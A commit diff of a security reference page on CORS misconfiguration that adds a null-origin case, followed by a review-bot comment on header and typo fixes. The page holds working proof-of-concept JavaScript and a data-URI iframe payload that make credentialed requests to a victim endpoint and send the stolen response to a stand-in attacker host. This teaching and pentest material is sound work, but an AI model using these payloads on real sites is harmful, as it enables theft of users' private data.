Added: CORS Misconfiguration with Null Origin allowed

This commit is contained in:
Emanuel Duss 2020-04-12 14:29:10 +02:00
parent 930a3a0d8c
commit 4537555714


@ -1,90 +1,133 @@
# CORS Misconfiguration # CORS Misconfiguration
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials. > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials.
## Summary ## Summary
* [Prerequisites](#prerequisites) * [Prerequisites](#prerequisites)
* [Exploitation](#exploitation) * [Exploitation](#exploitation)
* [References](#references) * [References](#references)
## Prerequisites ## Prerequisites
* BURP HEADER> `Origin: https://evil.com` * BURP HEADER> `Origin: https://evil.com`
* VICTIM HEADER> `Access-Control-Allow-Credential: true` * VICTIM HEADER> `Access-Control-Allow-Credential: true`
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
## Exploitation ## Exploitation
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
### Vulnerable example ### Vulnerable Example: Origin Reflection
```powershell #### Vulnerable Implementation
GET /endpoint HTTP/1.1
Host: victim.example.com ```powershell
Origin: https://evil.com GET /endpoint HTTP/1.1
Cookie: sessionid=... Host: victim.example.com
Origin: https://evil.com
HTTP/1.1 200 OK Cookie: sessionid=...
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
{"[private API key]"} Access-Control-Allow-Credentials: true
```
{"[private API key]"}
### Proof of concept ```
```js #### Proof of concept
var req = new XMLHttpRequest();
req.onload = reqListener; ```js
req.open('get','https://victim.example.com/endpoint',true); var req = new XMLHttpRequest();
req.withCredentials = true; req.onload = reqListener;
req.send(); req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
function reqListener() { req.send();
location='//atttacker.net/log?key='+this.responseText;
}; function reqListener() {
``` location='//atttacker.net/log?key='+this.responseText;
};
or ```
```html or
<html>
<body> ```html
<h2>CORS PoC</h2> <html>
<div id="demo"> <body>
<button type="button" onclick="cors()">Exploit</button> <h2>CORS PoC</h2>
</div> <div id="demo">
<script> <button type="button" onclick="cors()">Exploit</button>
function cors() { </div>
var xhr = new XMLHttpRequest(); <script>
xhr.onreadystatechange = function() { function cors() {
if (this.readyState == 4 && this.status == 200) { var xhr = new XMLHttpRequest();
document.getElementById("demo").innerHTML = alert(this.responseText); xhr.onreadystatechange = function() {
} if (this.readyState == 4 && this.status == 200) {
}; document.getElementById("demo").innerHTML = alert(this.responseText);
xhr.open("GET", }
"https://victim.example.com/endpoint", true); };
xhr.withCredentials = true; xhr.open("GET",
xhr.send(); "https://victim.example.com/endpoint", true);
} xhr.withCredentials = true;
</script> xhr.send();
</body> }
</html> </script>
``` </body>
</html>
## Bug Bounty reports ```
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) ### Vulnerable Example: Null Origin
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) #### Vulnerable Implementation
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) It's possible that the server does not reflect the complete `Origin` header but
that the `null` origin is allowed. This would look like this in the server's
## References response:
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) ```
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) GET /endpoint HTTP/1.1
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) Host: victim.example.com
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) Origin: null
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
{"[private API key]"}
```
#### Proof of concept
This can be exploited by putting the attack code into an iframe using the data
URI scheme. If the data URI scheme is used, the browser will use the `null`
origin in the request:
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
var req = new XMLHttpRequest ();
req.onload = reqListener;
req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
```
## Bug Bounty reports
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
## References
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
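Review bot: The Prerequisites list still carries the wrong header name on the unchanged line `VICTIM HEADER> Access-Control-Allow-Credential: true`; the response header is `Access-Control-Allow-Credentials: true` (plural), which is what both request/response examples further down actually show. Since this change already edits the neighbouring `Access-Control-Allow-Origin` line to add the `null` case, fix the header name in the same commit so the prerequisites match the examples. Two smaller points in the same hunk: the new Null Origin request/response block is fenced without a language tag while the Origin Reflection block above it uses ```powershell, so pick one tag (an `http` tag would describe both better than `powershell`) and use it for both; and the unchanged first proof of concept still exfiltrates to `//atttacker.net/log?key=` (three t's), whereas the new PoC uses a `$exploit-server-url` placeholder, so either correct the typo or switch the old PoC to the same placeholder.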